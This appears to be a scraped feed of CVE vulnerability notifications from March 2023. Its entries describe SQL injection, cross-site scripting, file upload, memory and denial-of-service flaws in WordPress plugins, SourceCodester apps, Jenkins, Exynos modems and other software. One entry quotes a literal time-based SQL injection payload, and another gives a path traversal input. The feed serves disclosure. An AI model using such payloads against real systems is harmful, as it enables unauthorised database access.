🚨 CVE-2023-27235An arbitrary file upload vulnerability in the \admin\c\CommonController.php component of Jizhicms v2.4.5 allows attackers to execute arbitrary code via a crafted phtml file.🎖@cveNotify |
|
| 2023-03-17 20:29:37 |
🚨 CVE-2023-24726Art Gallery Management System v1.0 was discovered to contain a SQL injection vulnerability via the viewid parameter on the enquiry page.🎖@cveNotify |
|
| 2023-03-17 20:29:36 |
🚨 CVE-2019-10790taffydb npm module, vulnerable in all versions up to and including 2.7.3, allows attackers to forge adding additional properties into user-input processed by taffy which can allow access to any data items in the DB. taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If index is found in the query, taffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g., T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB.🎖@cveNotify |
|
| 2023-03-17 19:29:36 |
🚨 CVE-2023-27483crossplane-runtime is a set of go libraries used to build Kubernetes controllers in Crossplane and its related stacks. An out of memory panic vulnerability has been discovered in affected versions. Applications that use the `Paved` type's `SetValue` method with user provided input without proper validation might use excessive amounts of memory and cause an out of memory panic. In the fieldpath package, the Paved.SetValue method sets a value on the Paved object according to the provided path, without any validation. This allows setting values in slices at any provided index, which grows the target array up to the requested index, the index is currently capped at max uint32 (4294967295) given how indexes are parsed, but that is still an unnecessarily large value. If callers are not validating paths' indexes on their own, which most probably are not going to do, given that the input is parsed directly in the SetValue method, this could allow users to consume arbitrary amounts of memory. Applications that do not use the `Paved` type's `SetValue` method are not affected. This issue has been addressed in versions 0.16.1 and 0.19.2. Users are advised to upgrade. Users unable to upgrade can parse and validate the path before passing it to the `SetValue` method of the `Paved` type, constraining the index size as deemed appropriate.🎖@cveNotify |
|
| 2023-03-17 19:29:35 |
🚨 CVE-2023-27581github-slug-action is a GitHub Action to expose slug value of GitHub environment variables inside of one's GitHub workflow. Starting in version 4.0.0` and prior to version 4.4.1, this action uses the `github.head_ref` parameter in an insecure way. This vulnerability can be triggered by any user on GitHub on any workflow using the action on pull requests. They just need to create a pull request with a branch name, which can contain the attack payload. This can be used to execute code on the GitHub runners and to exfiltrate any secrets one uses in the CI pipeline. A patched action is available in version 4.4.1. No workaround is available.🎖@cveNotify |
|
| 2023-03-17 17:30:01 |
🚨 CVE-2023-1471The WP Popup Banners plugin for WordPress is vulnerable to SQL Injection via the 'banner_id' parameter in versions up to, and including, 1.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with minimal permissions, such as a subscrber, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2023-03-17 17:30:00 |
🚨 CVE-2023-1472The RapidLoad Power-Up for Autoptimize plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.1. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions, via forged request granted they can trick a site administrator into performing an action such as clicking on a link. Actions include resetting the API key, accessing or deleting log files, and deleting cache among others.🎖@cveNotify |
|
| 2023-03-17 17:29:55 |
🚨 CVE-2023-1474A vulnerability classified as critical was found in SourceCodester Automatic Question Paper Generator System 1.0. This vulnerability affects unknown code of the file users/question_papers/manage_question_paper.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223336.🎖@cveNotify |
|
| 2023-03-17 17:29:54 |
🚨 CVE-2023-1475A vulnerability, which was classified as critical, has been found in SourceCodester Canteen Management System 1.0. This issue affects the function query of the file createuser.php. The manipulation of the argument uemail leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223337 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 17:29:53 |
🚨 CVE-2023-23622Discourse is an open-source discussion platform. Prior to version 3.0.1 of the `stable` branch and version 3.1.0.beta2 of the `beta` and `tests-passed` branches, the count of topics displayed for a tag is a count of all regular topics regardless of whether the topic is in a read restricted category or not. As a result, any users can technically poll a sensitive tag to determine if a new topic is created in a category which the user does not have excess to. In version 3.0.1 of the `stable` branch and version 3.1.0.beta2 of the `beta` and `tests-passed` branches, the count of topics displayed for a tag defaults to only counting regular topics which are not in read restricted categories. Staff users will continue to see a count of all topics regardless of the topic's category read restrictions.🎖@cveNotify |
|
| 2023-03-17 17:29:52 |
🚨 CVE-2023-26040Discourse is an open-source discussion platform. Between versions 3.1.0.beta2 and 3.1.0.beta3 of the `tests-passed` branch, editing or responding to a chat message containing malicious content could lead to a cross-site scripting attack. This issue is patched in version 3.1.0.beta3 of the `tests-passed` branch. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-17 17:29:51 |
🚨 CVE-2023-1172The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the full name value in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-03-17 17:29:47 |
🚨 CVE-2023-1469The WP Express Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘pec_coupon[code]’ parameter in versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: This can potentially be exploited by lower-privileged users if the `Admin Dashboard Access Permission` setting it set for those users to access the dashboard.🎖@cveNotify |
|
| 2023-03-17 17:29:46 |
🚨 CVE-2016-15028A vulnerability was found in ICEPAY REST-API-NET 0.9. It has been declared as problematic. Affected by this vulnerability is the function RestClient of the file Classes/RestClient.cs of the component Checksum Validation. The manipulation leads to improper validation of integrity check value. The attack can be launched remotely. Upgrading to version 1.0 is able to address this issue. The name of the patch is 61f6b8758e5c971abff5f901cfa9f231052b775f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222847.🎖@cveNotify |
|
| 2023-03-17 17:29:45 |
🚨 CVE-2023-24975IBM Spectrum Symphony 7.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 247030.🎖@cveNotify |
|
| 2023-03-17 17:29:44 |
🚨 CVE-2021-21938A heap-based buffer overflow vulnerability exists in the Palette box parser functionality of Accusoft ImageGear 19.10. A specially-crafted file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-17 17:29:39 |
🚨 CVE-2023-27484crossplane-runtime is a set of go libraries used to build Kubernetes controllers in Crossplane and its related stacks. In affected versions an already highly privileged user able to create or update Compositions can specify an arbitrarily high index in a patch's `ToFieldPath`, which could lead to excessive memory usage once such Composition is selected for a Composite resource. Compositions allow users to specify patches inserting elements into arrays at an arbitrary index. When a Composition is selected for a Composite Resource, patches are evaluated and if a specified index is greater than the current size of the target slice, Crossplane will grow that slice up to the specified index, which could lead to an excessive amount of memory usage and therefore the Pod being OOM-Killed. The index is already capped to the maximum value for a uint32 (4294967295) when parsed, but that is still an unnecessarily large value. This issue has been addressed in versions 1.11.2, 1.10.3, and 1.9.2. Users are advised to upgrade. Users unable to upgrade can restrict write privileges on Compositions to only admin users as a workaround.🎖@cveNotify |
|
| 2023-03-17 17:29:38 |
🚨 CVE-2023-1369A vulnerability was found in TG Soft Vir.IT eXplorer 9.4.86.0. It has been rated as problematic. This issue affects some unknown processing in the library VIRAGTLT.sys of the component IoControlCode Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 9.5 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-222875.🎖@cveNotify |
|
| 2023-03-17 17:29:37 |
🚨 CVE-2020-36670The NEX-Forms. plugin for WordPress is vulnerable to unauthorized disclosure and modification of data in versions up to, and including 7.7.1 due to missing capability checks on several AJAX actions. This makes it possible for authenticated attackers with subscriber level permissions and above to invoke these functions which can be used to perform actions like modify form submission records, deleting files, sending test emails, modifying plugin settings, and more.🎖@cveNotify |
|
| 2023-03-17 17:29:36 |
🚨 CVE-2020-36669The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including 1.3.9. This is due to missing nonce validation on the backup_guard_get_import_backup() function. This makes it possible for unauthenticated attackers to upload arbitrary files to the vulnerable site's server via a forged request, granted they can trick a site's administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-03-17 15:29:56 |
🚨 CVE-2020-36668The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to sensitive information disclosure in versions up to, and including, 1.4.0 due to a lack of proper capability checking on the backup_guard_get_manual_modal function called via an AJAX action. This makes it possible for subscriber-level attackers, and above, to invoke the function and obtain database table information.🎖@cveNotify |
|
| 2023-03-17 15:29:55 |
🚨 CVE-2020-36667The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to unauthorized back-up location changes in versions up to, and including 1.4.1 due to a lack of proper capability checking on the backup_guard_cloud_dropbox, backup_guard_cloud_gdrive, and backup_guard_cloud_oneDrive functions. This makes it possible for authenticated attackers, with minimal permissions, such as a subscriber to change to location of back-ups and potentially steal sensitive information from them.🎖@cveNotify |
|
| 2023-03-17 15:29:51 |
🚨 CVE-2023-24033The Samsung Exynos Modem 5123, Exynos Modem 5300, Exynos 980, Exynos 1080, and Exynos Auto T512 baseband modem chipsets do not properly check format types specified by the Session Description Protocol (SDP) module, which can lead to a denial of service.🎖@cveNotify |
|
| 2023-03-17 15:29:50 |
🚨 CVE-2023-26956onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/curd/code.🎖@cveNotify |
|
| 2023-03-17 15:29:49 |
🚨 CVE-2023-1172The Bookly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the full name value in versions up to, and including, 21.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-03-17 15:29:48 |
🚨 CVE-2023-1469The WP Express Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘pec_coupon[code]’ parameter in versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: This can potentially be exploited by lower-privileged users if the `Admin Dashboard Access Permission` setting it set for those users to access the dashboard.🎖@cveNotify |
|
| 2023-03-17 15:29:44 |
🚨 CVE-2023-1463Improper Authorization in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.🎖@cveNotify |
|
| 2023-03-17 15:29:43 |
🚨 CVE-2023-1464A vulnerability, which was classified as critical, was found in SourceCodester Medicine Tracker System 1.0. This affects an unknown part of the file Users.php?f=save_user. The manipulation of the argument firstname/middlename/lastname/username/password leads to improper authentication. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-223311.🎖@cveNotify |
|
| 2023-03-17 15:29:42 |
🚨 CVE-2023-1467A vulnerability classified as critical has been found in SourceCodester Student Study Center Desk Management System 1.0. Affected is an unknown function of the file Master.php?f=delete_img of the component POST Parameter Handler. The manipulation of the argument path with the input C%3A%2Ffoo.txt leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223326 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 15:29:41 |
🚨 CVE-2023-1468A vulnerability classified as critical was found in SourceCodester Student Study Center Desk Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/?page=reports&date_from=2023-02-17&date_to=2023-03-17 of the component Report Handler. The manipulation of the argument date_from/date_to leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-223327.🎖@cveNotify |
|
| 2023-03-17 15:29:37 |
🚨 CVE-2023-1439A vulnerability, which was classified as critical, has been found in SourceCodester Medicine Tracker System 1.0. This issue affects some unknown processing of the file medicines/view_details.php of the component GET Parameter Handler. The manipulation of the argument GET leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223283.🎖@cveNotify |
|
| 2023-03-17 15:29:36 |
🚨 CVE-2023-1441A vulnerability has been found in SourceCodester Automatic Question Paper Generator System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/courses/view_course.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223285 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 15:29:35 |
🚨 CVE-2023-1442A vulnerability was found in Meizhou Qingyunke QYKCMS 4.3.0. It has been classified as problematic. This affects an unknown part of the file /admin_system/api.php of the component Update Handler. The manipulation of the argument downurl leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223287.🎖@cveNotify |
|
| 2023-03-17 13:29:41 |
🚨 CVE-2023-1443A vulnerability was found in Filseclab Twister Antivirus 8. It has been declared as problematic. This vulnerability affects unknown code in the library fildds.sys of the component IoControlCode Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223288.🎖@cveNotify |
|
| 2023-03-17 13:29:40 |
🚨 CVE-2023-1444A vulnerability was found in Filseclab Twister Antivirus 8. It has been rated as critical. This issue affects some unknown processing in the library fildds.sys of the component IoControlCode Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223289 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 13:29:39 |
🚨 CVE-2023-1445A vulnerability classified as problematic has been found in Filseclab Twister Antivirus 8. Affected is an unknown function in the library fildds.sys of the component IoControlCode Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. VDB-223290 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 13:29:38 |
🚨 CVE-2023-1446A vulnerability classified as problematic was found in Watchdog Anti-Virus 1.4.214.0. Affected by this vulnerability is an unknown functionality in the library wsdk-driver.sys of the component IoControlCode Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223291.🎖@cveNotify |
|
| 2023-03-17 13:29:37 |
🚨 CVE-2023-1453A vulnerability was found in Watchdog Anti-Virus 1.4.214.0. It has been rated as critical. Affected by this issue is some unknown functionality in the library wsdk-driver.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-223298 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 10:29:47 |
🚨 CVE-2023-1448A vulnerability, which was classified as problematic, was found in GPAC 2.3-DEV-rev35-gbbca86917-master. This affects the function gf_m2ts_process_sdt of the file media_tools/mpegts.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223293 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 10:29:45 |
🚨 CVE-2023-1450A vulnerability was found in MP4v2 2.1.2 and classified as problematic. This issue affects the function DumpTrack of the file mp4trackdump.cpp. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223295.🎖@cveNotify |
|
| 2023-03-17 10:29:44 |
🚨 CVE-2023-1451A vulnerability was found in MP4v2 2.1.2. It has been classified as problematic. Affected is the function mp4v2::impl::MP4Track::GetSampleFileOffset of the file mp4track.cpp. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223296.🎖@cveNotify |
|
| 2023-03-17 10:29:40 |
🚨 CVE-2023-1452A vulnerability was found in GPAC 2.3-DEV-rev35-gbbca86917-master. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file filters/load_text.c. The manipulation leads to buffer overflow. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The identifier VDB-223297 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 10:29:39 |
🚨 CVE-2023-1453A vulnerability was found in Watchdog Anti-Virus 1.4.214.0. It has been rated as critical. Affected by this issue is some unknown functionality in the library wsdk-driver.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-223298 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-17 10:29:37 |
🚨 CVE-2023-1455A vulnerability classified as critical was found in SourceCodester Online Pizza Ordering System 1.0. This vulnerability affects unknown code of the file admin/ajax.php?action=login2 of the component Login Page. The manipulation of the argument email with the input abc%40qq.com' AND (SELECT 9110 FROM (SELECT(SLEEP(5)))XSlc) AND 'jFNl'='jFNl leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223300.🎖@cveNotify |
|
| 2023-03-17 10:29:36 |
🚨 CVE-2021-21548Dell EMC Unisphere for PowerMax versions before 9.1.0.27, Dell EMC Unisphere for PowerMax Virtual Appliance versions before 9.1.0.27, and PowerMax OS Release 5978 contain an improper certificate validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to carry out a man-in-the-middle attack by supplying a crafted certificate and intercepting the victim's traffic to view or modify a victim’s data in transit.🎖@cveNotify |
|
| 2023-03-17 06:29:40 |
🚨 CVE-2023-28531ssh-add in OpenSSH before 9.3 adds smartcard keys to ssh-agent without the intended per-hop destination constraints.🎖@cveNotify |
|
| 2023-03-17 06:29:37 |
🚨 CVE-2023-26073An issue was discovered in Samsung Mobile Chipset and Baseband Modem Chipset for Exynos 850, Exynos 980, Exynos 1080, Exynos 1280, Exynos 2200, Exynos Modem 5123, Exynos Modem 5300, and Exynos Auto T5123. A heap-based buffer overflow in the 5G MM message codec can occur due to insufficient parameter validation when decoding the extended emergency number list.🎖@cveNotify |
|
| 2023-03-17 06:29:36 |
🚨 CVE-2023-26072An issue was discovered in Samsung Mobile Chipset and Baseband Modem Chipset for Exynos 850, Exynos 980, Exynos 1080, Exynos 1280, Exynos 2200, Exynos Modem 5123, Exynos Modem 5300, and Exynos Auto T5123. A heap-based buffer overflow in the 5G MM message codec can occur due to insufficient parameter validation when decoding the Emergency number list.🎖@cveNotify |
|
| 2023-03-17 06:29:35 |
🚨 CVE-2023-26075An issue was discovered in Samsung Mobile Chipset and Baseband Modem Chipset for Exynos 850, Exynos 980, Exynos 1080, Exynos 1280, Exynos 2200, Exynos Modem 5123, Exynos Modem 5300, and Exynos Auto T5123. An intra-object overflow in the 5G MM message codec can occur due to insufficient parameter validation when decoding the Service Area List.🎖@cveNotify |
|
| 2023-03-17 00:29:35 |
🚨 CVE-2023-27059A cross-site scripting (XSS) vulnerability in the Edit Group function of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Group Name text field.🎖@cveNotify |
|
| 2023-03-16 21:29:47 |
🚨 CVE-2023-0349The Akuvox E11 libvoice library provides unauthenticated access to the camera capture for image and video. This could allow an attacker to view and record image and video from the camera.🎖@cveNotify |
|
| 2023-03-16 21:29:46 |
🚨 CVE-2023-27371GNU libmicrohttpd before 0.9.76 allows remote DoS (Denial of Service) due to improper parsing of a multipart/form-data boundary in the postprocessor.c MHD_create_post_processor() method. This allows an attacker to remotely send a malicious HTTP POST packet that includes one or more '\0' bytes in a multipart/form-data boundary field, which - assuming a specific heap layout - will result in an out-of-bounds read and a crash in the find_boundary() function.🎖@cveNotify |
|
| 2023-03-16 21:29:43 |
🚨 CVE-2023-0811Omron CJ1M unit v4.0 and prior has improper access controls on the memory region where the UM password is stored. If an adversary issues a PROGRAM AREA WRITE command to a specific memory region, they could overwrite the password. This may lead to disabling UM protections or setting a non-ASCII password (non-keyboard characters) and preventing an engineer from viewing or modifying the user program.🎖@cveNotify |
|
| 2023-03-16 21:29:42 |
🚨 CVE-2023-28100Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. Versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4 contain a vulnerability similar to CVE-2017-5226, but using the `TIOCLINUX` ioctl command instead of `TIOCSTI`. If a Flatpak app is run on a Linux virtual console such as `/dev/tty1`, it can copy text from the virtual console and paste it into the command buffer, from which the command might be run after the Flatpak app has exited. Ordinary graphical terminal emulators like xterm, gnome-terminal and Konsole are unaffected. This vulnerability is specific to the Linux virtual consoles `/dev/tty1`, `/dev/tty2` and so on. A patch is available in versions 1.10.8, 1.12.8, 1.14.4, and 1.15.4. As a workaround, don't run Flatpak on a Linux virtual console. Flatpak is primarily designed to be used in a Wayland or X11 graphical environment.🎖@cveNotify |
|
| 2023-03-16 21:29:41 |
🚨 CVE-2023-28104`silverstripe/graphql` serves Silverstripe data as GraphQL representations. In versions 4.2.2 and 4.1.1, an attacker could use a specially crafted graphql query to execute a denial of service attack against a website which has a publicly exposed graphql endpoint. This mostly affects websites with particularly large/complex graphql schemas. Users should upgrade to `silverstripe/graphql` 4.2.3 or 4.1.2 to remedy the vulnerability.🎖@cveNotify |
|
| 2023-03-16 21:29:37 |
🚨 CVE-2023-28105go-used-util has commonly used utility functions for Go. Versions prior to 0.0.34 have a ZipSlip issue when using fsutil package to unzip files. When users use `zip.Unzip` to unzip zip files from a malicious attacker, they may be vulnerable to path traversal. The issue has been fixed in version 0.0.34. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-16 21:29:36 |
🚨 CVE-2023-28108Pimcore is an open source data and experience management platform. Prior to version 10.5.19, quoting is not done properly in UUID DAO model. There is the theoretical possibility to inject custom SQL if the developer is using this methods with input data and not doing proper input validation in advance and so relies on the auto-quoting being done by the DAO class. Users should update to version 10.5.19 to receive a patch or, as a workaround, apply the patch manually.🎖@cveNotify |
|
| 2023-03-16 21:29:35 |
🚨 CVE-2023-28109Play With Docker is a browser-based Docker playground. Versions 0.0.2 and prior are vulnerable to domain hijacking. Because CORS configuration was not correct, an attacker could use `play-with-docker.com` as an example and set the origin header in an http request as `evil-play-with-docker.com`. The domain would echo in response header, which successfully bypassed the CORS policy and retrieved basic user information. This issue has been fixed in commit ed82247c9ab7990ad76ec2bf1498c2b2830b6f1a. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-16 19:29:40 |
🚨 CVE-2022-40531Memory corruption in WLAN due to incorrect type cast while sending WMI_SCAN_SCH_PRIO_TBL_CMDID message.🎖@cveNotify |
|
| 2023-03-16 17:30:03 |
🚨 CVE-2023-0219The FluentSMTP WordPress plugin before 2.2.3 does not sanitize or escape email content, making it vulnerable to stored cross-site scripting attacks (XSS) when an administrator views the email logs. This exploit requires other plugins to enable users to send emails with unfiltered HTML.🎖@cveNotify |
|
| 2023-03-16 17:30:02 |
🚨 CVE-2023-0477The Auto Featured Image (Auto Post Thumbnail) WordPress plugin before 3.9.16 includes an AJAX endpoint that allows any user with at least Author privileges to upload arbitrary files, such as PHP files. This is caused by incorrect file extension validation.🎖@cveNotify |
|
| 2023-03-16 17:30:01 |
🚨 CVE-2023-0538The Campaign URL Builder WordPress plugin before 1.8.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-03-16 17:30:00 |
🚨 CVE-2022-47484In telephony service, there is a missing permission check. This could lead to local denial of service in telephone service with no additional execution privileges needed.🎖@cveNotify |
|
| 2023-03-16 17:29:59 |
🚨 CVE-2023-0073The Client Logo Carousel WordPress plugin through 3.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-16 17:29:58 |
🚨 CVE-2023-0172The Juicer WordPress plugin before 1.11 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-03-16 17:29:56 |
🚨 CVE-2022-4661The Widgets for WooCommerce Products on Elementor WordPress plugin before 1.0.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-03-16 17:29:55 |
🚨 CVE-2023-0037The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection🎖@cveNotify |
|
| 2023-03-16 17:29:54 |
🚨 CVE-2023-0066The Companion Sitemap Generator WordPress plugin through 4.5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-16 17:29:53 |
🚨 CVE-2023-27900Jenkins 2.393 and earlier, LTS 2.375.3 and earlier uses the Apache Commons FileUpload library without specifying limits for the number of request parts introduced in version 1.5 for CVE-2023-24998 in hudson.util.MultipartFormDataParser, allowing attackers to trigger a denial of service.🎖@cveNotify |
|
| 2023-03-16 17:29:52 |
🚨 CVE-2022-47454In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-03-16 17:29:51 |
🚨 CVE-2023-27899Jenkins 2.393 and earlier, LTS 2.375.3 and earlier creates a temporary file in the default temporary directory with the default permissions for newly created files when uploading a plugin for installation, potentially allowing attackers with access to the Jenkins controller file system to read and write the file before it is used, potentially resulting in arbitrary code execution.🎖@cveNotify |
|
| 2023-03-16 17:29:50 |
🚨 CVE-2023-27898Jenkins 2.270 through 2.393 (both inclusive), LTS 2.277.1 through 2.375.3 (both inclusive) does not escape the Jenkins version a plugin depends on when rendering the error message stating its incompatibility with the current version of Jenkins, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide plugins to the configured update sites and have this message shown by Jenkins instances.🎖@cveNotify |
|
| 2023-03-16 17:29:49 |
🚨 CVE-2023-27577flarum is a forum software package for building communities. In versions prior to 1.7.0 an admin account which has already been compromised by an attacker may use a vulnerability in the `LESS` parser which can be exploited to read sensitive files on the server through the use of path traversal techniques. An attacker can achieve this by providing an absolute path to a sensitive file in the custom `LESS` setting, which the `LESS` parser will then read. For example, an attacker could use the following code to read the contents of the `/etc/passwd` file on a linux machine. The scope of what files are vulnerable will depend on the permissions given to the running flarum process. The vulnerability has been addressed in version `1.7`. Users should upgrade to this version to mitigate the vulnerability. Users unable to upgrade may mitigate the vulnerability by ensuring that their admin accounts are secured with strong passwords and follow other best practices for account security. Additionally, users can limit the exposure of sensitive files on the server by implementing appropriate file permissions and access controls at the operating system level.🎖@cveNotify |
|
| 2023-03-16 17:29:48 |
🚨 CVE-2023-1391A vulnerability, which was classified as problematic, was found in SourceCodester Online Tours & Travels Management System 1.0. Affected is an unknown function of the file admin/ab.php. The manipulation of the argument img leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222978 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-16 17:29:44 |
🚨 CVE-2023-1392A vulnerability has been found in SourceCodester Online Pizza Ordering System 1.0 and classified as critical. Affected by this vulnerability is the function save_menu. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222979.🎖@cveNotify |
|
| 2023-03-16 17:29:43 |
🚨 CVE-2023-1394A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0. It has been classified as critical. This affects the function mysqli_query of the file bsitemp.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-222981 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-16 17:29:41 |
🚨 CVE-2023-25148A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to exploit the vulnerability by changing a specific file into a pseudo-symlink, allowing privilege escalation on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-03-16 17:29:40 |
🚨 CVE-2023-1396A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin/traveller_details.php. The manipulation of the argument address leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222983.🎖@cveNotify |
|
| 2023-03-16 15:30:01 |
🚨 CVE-2023-1433A vulnerability was found in SourceCodester Gadget Works Online Ordering System 1.0. It has been classified as problematic. This affects an unknown part of the file admin/products/controller.php?action=add of the component Products Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223215.🎖@cveNotify |
|
| 2023-03-16 15:30:00 |
🚨 CVE-2023-27875IBM Aspera Faspex 5.0.4 could allow an authenticated user to change other user's credentials due to improper access controls. IBM X-Force ID: 249847.🎖@cveNotify |
|
| 2023-03-16 15:29:59 |
🚨 CVE-2022-34376Dell PowerEdge BIOS and Dell Precision BIOS contain an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by manipulating an SMI to cause a denial of service during SMM.🎖@cveNotify |
|
| 2023-03-16 15:29:58 |
